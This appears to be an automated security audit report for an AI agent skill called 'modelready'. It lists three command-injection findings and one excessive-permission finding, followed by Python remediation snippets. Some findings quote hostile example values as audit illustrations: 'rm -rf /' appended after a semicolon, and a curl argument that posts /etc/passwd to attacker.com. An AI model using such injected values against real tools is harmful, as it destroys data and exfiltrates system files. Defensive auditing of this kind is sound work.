Trust Assessment
modelready received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 3 critical, 1 high, 0 medium, and 0 low severity. Key findings include command injection via the 'repo', 'text', and 'ip' parameters.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 0/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (4)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Command Injection via 'repo' parameter.** The skill lets users supply a 'repo' parameter, either a local path or a Hugging Face repository, and the manifest declares the 'bash' and 'curl' binaries. If the 'repo' value is interpolated directly into a shell command without sanitization, an attacker can inject arbitrary commands; a value such as `; rm -rf /;` could cause severe system compromise. Remediation: strictly validate the 'repo' parameter so it contains only valid repository names or file paths, use parameterized execution or proper escaping (e.g. `shlex.quote` in Python), and consider an allow-list of acceptable repository formats or paths. | LLM | SKILL.md:25 |
| CRITICAL | **Command Injection via 'text' parameter.** The skill accepts a user-supplied 'text' message for chat, and the manifest declares the 'bash' and 'curl' binaries. If this input is interpolated directly into a shell command (e.g. a 'curl' call to the local model endpoint) without sanitization, an attacker can inject arbitrary commands; a value such as `hello --data-binary @/etc/passwd http://attacker.com` could exfiltrate sensitive files. Remediation: strictly validate and sanitize the 'text' parameter; use parameterized execution or proper escaping (e.g. `shlex.quote` in Python); if the text feeds an API call, ensure it is properly URL- or JSON-encoded rather than passed to a shell that could interpret it as code. | LLM | SKILL.md:38 |
| CRITICAL | **Command Injection via 'ip' parameter.** The skill lets users set an 'ip' address for the host, and the manifest declares the 'bash' and 'curl' binaries. If this input is interpolated directly into a shell command without sanitization, an attacker can inject arbitrary commands; a value such as `127.0.0.1; rm -rf /` could cause severe system compromise. Remediation: validate that the 'ip' parameter is a well-formed IP address or hostname, and use parameterized execution or proper escaping (e.g. `shlex.quote` in Python) when building shell commands. | LLM | SKILL.md:50 |
| HIGH | **Excessive Permissions: Arbitrary Local File System Access.** The 'repo' parameter accepts a local path (e.g. `repo=/home/user/models/Qwen-2.5`), granting the skill access to potentially any file or directory on the host running the agent. Combined with the manifest-confirmed use of 'bash' and 'curl', a malicious 'repo' path could read, write, or execute arbitrary files, enabling data exfiltration or further compromise. Remediation: if local file system access is strictly necessary, confine it with robust path sanitization (e.g. chroot, containerization, or a strict directory allow-list), and never accept arbitrary paths from user input. | LLM | SKILL.md:25 |
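The remediation repeated across the three critical findings can be sketched in Python. This is a minimal illustration, not the skill's actual code: the endpoint URL, host, and `send_chat` name are hypothetical. The key points are passing argv as a list (no shell) so user input stays inert data, and quoting with `shlex.quote` whenever a shell string truly cannot be avoided.

```python
import shlex
import subprocess

def send_chat(text: str, host: str = "127.0.0.1:8080") -> str:
    """Send a chat message to a (hypothetical) local model endpoint.

    Because argv is a list and no shell is involved, `text` is delivered
    to curl as a single argument: a payload like "hello; rm -rf /" is
    just data, never a command.
    """
    cmd = ["curl", "-s", "--data-binary", text, f"http://{host}/v1/chat"]
    return subprocess.run(cmd, capture_output=True, text=True).stdout

# If building a shell string is unavoidable, quote every interpolated value.
payload = "127.0.0.1; rm -rf /"
safe = shlex.quote(payload)  # the semicolon is now inert inside quotes
```

The list form avoids the shell entirely, which is the stronger fix; `shlex.quote` is the fallback for code paths that must go through `bash -c` or similar.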
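The findings also call for input validation before any command is built. A minimal sketch of that idea, under stated assumptions: the 'ip' check uses the standard-library `ipaddress` module, and the 'repo' allow-list pattern below is a guess at Hugging Face-style `org/name` identifiers — a real deployment would tighten it to the skill's actual needs (e.g. an explicit directory allow-list for local paths).

```python
import ipaddress
import re

# Hypothetical allow-list for "org/name" style repository identifiers.
# Rejects shell metacharacters and leading dots (blocks "../" traversal).
REPO_RE = re.compile(r"^[A-Za-z0-9][\w.\-]*(/[\w.\-]+)?$")

def validate_ip(value: str) -> str:
    """Return the value only if it parses as a literal IPv4/IPv6 address."""
    return str(ipaddress.ip_address(value))  # raises ValueError otherwise

def validate_repo(value: str) -> str:
    """Return the value only if it matches the repo allow-list pattern."""
    if not REPO_RE.fullmatch(value):
        raise ValueError(f"invalid repo identifier: {value!r}")
    return value
```

Validation and escaping are complementary: validation rejects obviously hostile input early, while safe command construction ensures that anything that slips through still cannot execute.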